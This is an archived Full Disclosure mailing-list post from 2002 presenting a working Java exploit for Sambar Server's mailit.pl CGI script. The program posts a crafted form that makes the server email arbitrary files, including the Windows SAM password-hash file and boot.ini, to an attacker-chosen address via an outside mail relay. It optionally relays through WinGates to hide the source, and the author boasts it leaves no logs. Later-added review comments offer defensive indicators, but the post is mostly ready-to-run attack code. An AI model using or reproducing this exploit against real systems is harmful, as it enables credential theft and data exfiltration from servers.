Full Disclosure mailing list archives
[ElectronicSouls] - Sambar Exploit
From: es () hush com
Date: Fri, 29 Nov 2002 09:21:13 -0800
-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here is an exploit for Sambar Server's mailit.pl, written in JAVA.
we were taught JAVA by KF[0dd], the internet's premier exploit writing genius,
and technical support to most ADM/0dd exploits.

# cat SambarMailit.java

/*---Written by Craig[TM]--- Electronicsouls-2001
 * This little java Exploit will use Sambar Servers' mailit.pl
 * to send any file to your eMail address.
 *
 * To use this, you need a...
 *
 * - mail relay
 * - secure eMail address (http://www.hushmail.com)
 * - java compiler and a Sambar Server<=4.2 with mailit.pl of course
 *
 * When using WinGates, separate them with "," like this:
 * Enter Wingate/s>127.0.0.1,192.168.0.10,192.168.0.1
 *
 * This exploit should leave NO logfiles - well, at least on my own server it did not!
 *
 *
 * BTW:I dunno if I may call this '0day' - somewhere on
 * a blackhead website i found a hint that there was an issue with
 * mailit.pl, so I figured it out...
 *
 *
 * [Craig]
 *
 * He...don't use this to deface...this is proof-of-concept code only!
 *
 * Last thing: BE PATIENT...THE EXPLOIT NEEDS SOME TIME TO RUN!
 *
 */

import java.io.*;
import java.net.*;
import java.util.*;

// Console client: prompts for a target host, an optional WinGate chain, an SMTP relay,
// a recipient address and a file path, then sends one HTTP POST to /cgi-bin/mailit.pl
// and prints the reply until a success/failure marker is seen.
//
// NOTE(review), defensive reading of this listing:
//  - The request places a caller-chosen local path in the "attach" form field and a
//    caller-chosen SMTP host in "server". Per the author's header above, mailit.pl on
//    Sambar Server <= 4.2 then mails that file out. The weakness described is the CGI
//    script accepting both values unchecked, so the fix belongs on the server: remove or
//    access-restrict mailit.pl and move to a release where it is fixed (the fixed
//    version is not stated on this page - confirm with the vendor).
//  - Values visible below that can be matched in request captures: POST to
//    /cgi-bin/mailit.pl, an "attach=" value holding an absolute path, the static
//    "body=Phile4U", "from=hacked@<host>" and "subject=Sambar-File" fields, and the fixed
//    User-Agent string. All of them are plain literals in this code, so treat them as
//    weak indicators only.
//  - Presumably the more durable signal is the web server host opening SMTP sessions to
//    a relay it does not normally use; egress filtering for that host would limit it.
//  - The header's "NO logfiles" remark is the author's observation on one server and is
//    not verified here.
//  - The listing is re-wrapped for reading; the PGP signature further down applies to
//    the original message text, not to this layout.
public class SambarMailit
{
  //line from server that is read in
  static String line="";

  //arrays for wingates
  // fixed capacity of 100 entries; unused slots stay null and act as the end marker in Verbinde()
  static String Wingates[]=new String[100];

  //vars for the user input from console
  static String SMTPServer; // mail relay, sent as the "server" form field
  static String Server;     // target web server host name or address
  static String File;       // path sent as the "attach" form field
  static String eMail;      // recipient, sent as the "recipient" form field

  //the shit for the socket ;)
  static DataInputStream in = new DataInputStream (System.in);
  static DataInputStream sin; // reads from the socket
  static PrintStream sout;    // writes to the socket
  static Socket s=null;

  //some "switches" int the program
  static boolean useWingates=false;
  static int Mode; // menu choice 1..4, set by HoleModus()

  //the user menu
  // Prints the four options, reads one line from the console and stores it in Mode.
  // Exits the JVM on an out-of-range value or on option 4.
  // Only IOException is caught; a non-numeric answer is not handled here.
  void HoleModus()
  {
    try
    {
      System.out.println("What do you want?");
      System.out.println("(1) send me C:\\winnt\\repair\\sam._");
      System.out.println("(2) send me C:\\boot.ini");
      System.out.println("(3) send me a file I want");
      System.out.println("(4) quit");
      System.out.print(">");
      // local reader shadows the static field "in"; readLine() on DataInputStream is deprecated
      DataInputStream in = new DataInputStream (System.in);
      String raw=in.readLine();
      Mode=Integer.valueOf(raw).intValue();
      // Mode%1 is always 0 for an int, so only the range tests can trigger
      if (Mode<1 || Mode>4 || Mode%1!=0) {System.out.println("invalid option! quitting...");System.exit(0);}
      if (Mode==4)System.exit(0);
      System.out.print("\n");
    }//try
    catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
  }//get()

  //ask user for server
  // Reads one console line into the static field Server; no validation is applied.
  void HoleServer()
  {
    try
    {
      System.out.print("Enter Server>");
      DataInputStream in = new DataInputStream (System.in);
      Server=in.readLine();
    }//try
    catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
  }//get()

  //ask user for wingates - i would strongly suggest to use this!
  // Reads a comma-separated list, trims each entry into Wingates[] and sets
  // useWingates when the first slot is filled.
  void HoleWingates()
  {
    try
    {
      System.out.print("Enter Wingate/s>");
      DataInputStream in = new DataInputStream (System.in);
      String WingatesRaw=in.readLine();
      StringTokenizer token = new StringTokenizer(WingatesRaw, ",");
      int num_tokens = token.countTokens();
      for (int i = 0;i< num_tokens;i++)
      {
        Wingates[i]=token.nextToken();
        Wingates[i]=Wingates[i].trim();
      }
      if (Wingates[0]!=null && Wingates[0]!="")useWingates=true;
      //for (int i=0;Wingates[i]!=null;i++)System.out.println("Wingate["+i+"]:"+Wingates[i]);
    }//try
    catch (IOException e) {System.out.println("Error with your Wingates:"+e);}
  }//HoleWingates

  //ask user where to download and so on...
  // Reads the SMTP relay and recipient address; in mode 3 also reads the file path.
  // The first two reads reassign the static field "in"; the mode-3 branch declares a local one.
  void HoleOptions()
  {
    try
    {
      System.out.print("Mail relay>");
      in = new DataInputStream (System.in);
      SMTPServer=in.readLine();
      System.out.print("My eMail>");
      in = new DataInputStream (System.in);
      eMail=in.readLine();
      if (Mode==3)
      {
        System.out.print("File to send>");
        DataInputStream in = new DataInputStream (System.in);
        File=in.readLine();
      }
    }
    catch (IOException e){System.out.println("Error reading input from Console:"+e);}
  }//

  //connect to the server with or without WinGates
  // Opens the socket s and wraps it in sin/sout. Without WinGates it connects straight
  // to Server on port 80. With WinGates it connects to Wingates[0] on port 23, writes a
  // "<host> 23" line for each further entry, and finally writes "<Server> 80".
  // NOTE(review): when the chain is used, the peer address recorded by the web server
  // would presumably be the last hop rather than the operator's own host - relevant
  // when attributing log entries.
  void Verbinde()
  {
    try
    {
      if (useWingates==true)
      {
        s = new Socket(Wingates[0], 23);
        sin = new DataInputStream (s.getInputStream());
        sout = new PrintStream (s.getOutputStream());
        // walk the remaining entries until the first null slot
        for (int i=1;Wingates[i]!=null;i++)
        {
          System.out.println("Trying to connect to "+Wingates[i]+"...");
          sout.println(Wingates[i]+" 23");
          line=sin.readLine();
          System.out.println(line);
        }
        System.out.println("Now trying to connect to "+Server+":80...");
        sout.println(Server+" 80");
        System.out.println((line=sin.readLine()));
      }
      else
      {
        s = new Socket(Server, 80);
        sin = new DataInputStream (s.getInputStream());
        sout = new PrintStream (s.getOutputStream());
      }
    }//try
    catch (IOException e){System.out.println("Error Connecting:"+e);}
  }//verbinde()

  //main program
  // Runs the four prompts, fills File for modes 1 and 2, connects, writes the POST
  // request and echoes response lines until "MailIt Failed", "MailIt Succeeded." or
  // end of stream, then closes the socket.
  public static void main(String[] args)
  {
    // NOTE(review): the archived copy wraps the next string literal across two lines;
    // it is reproduced exactly as archived.
    System.out.println("\nCraig's Sambar<=4.2 (0day?) 
mailit.pl Exploit");
    SambarMailit Sam=new SambarMailit();
    Sam.HoleModus();
    Sam.HoleServer();
    Sam.HoleWingates();
    Sam.HoleOptions();
    try
    {
      if (Mode==1)File="C:\\winnt\\repair\\sam._";
      if (Mode==2)File="C:\\boot.ini";
      Sam.Verbinde();
      // request line and headers; every value except Host and Content-Length is a fixed literal
      sout.println("POST /cgi-bin/mailit.pl HTTP/1.1");
      sout.println("Content-Type: application/x-www-form-urlencoded");
      sout.println("User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)");
      sout.println("Host: "+Server);
      //for the POST command, we need to know the exact length of data to send
      // 72 equals the combined length of the literal field text in the body line below
      int l=72+Server.length()+SMTPServer.length()+eMail.length()+File.length();
      sout.println("Content-Length: "+l);
      sout.println("Connection: Keep-Alive\n");
      // form body: the user-supplied values are concatenated as typed (the URL-encoded
      // path survives only inside the inline comment)
      sout.println("server="+SMTPServer+"&recipient="+eMail+"&body=Phile4U&attach="+File/*C%3A%5Cwinnt%5Crepai r%5Csam._*/+"&from=hacked@"+Server+"&subject=Sambar-File");
      System.out.println();
      // echo the response and stop on either status marker or end of stream
      while (true)
      {
        line=sin.readLine();
        if (line==null)break;
        System.out.println(line);
        if (line.indexOf("MailIt Failed")>-1) {System.out.println("ERROR!\n\n");break;}
        if (line.indexOf("MailIt Succeeded.")>-1) {System.out.println("SUCCESS!\n\n");break;}
      }
      s.close();
    }//try
    catch (IOException e){System.out.println("Error!:"+e);}
  }//public
}//class

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Short Music For Short People."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nohoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltZQIAoID2JahMWrfN
jLArXryWRpZJuKjVAKC+RHRdI7jWnflBbiJVMfmEB1SOOA==
=8b73
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html